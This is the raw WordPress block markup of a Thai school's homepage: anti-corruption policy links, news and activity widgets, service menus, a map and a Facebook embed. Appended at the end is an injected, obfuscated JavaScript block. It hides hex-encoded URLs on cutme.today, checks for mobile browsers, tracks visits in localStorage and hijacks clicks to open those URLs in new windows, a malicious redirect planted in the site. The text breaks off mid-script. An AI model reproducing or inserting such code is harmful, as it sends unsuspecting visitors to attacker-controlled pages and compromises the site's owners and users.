900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 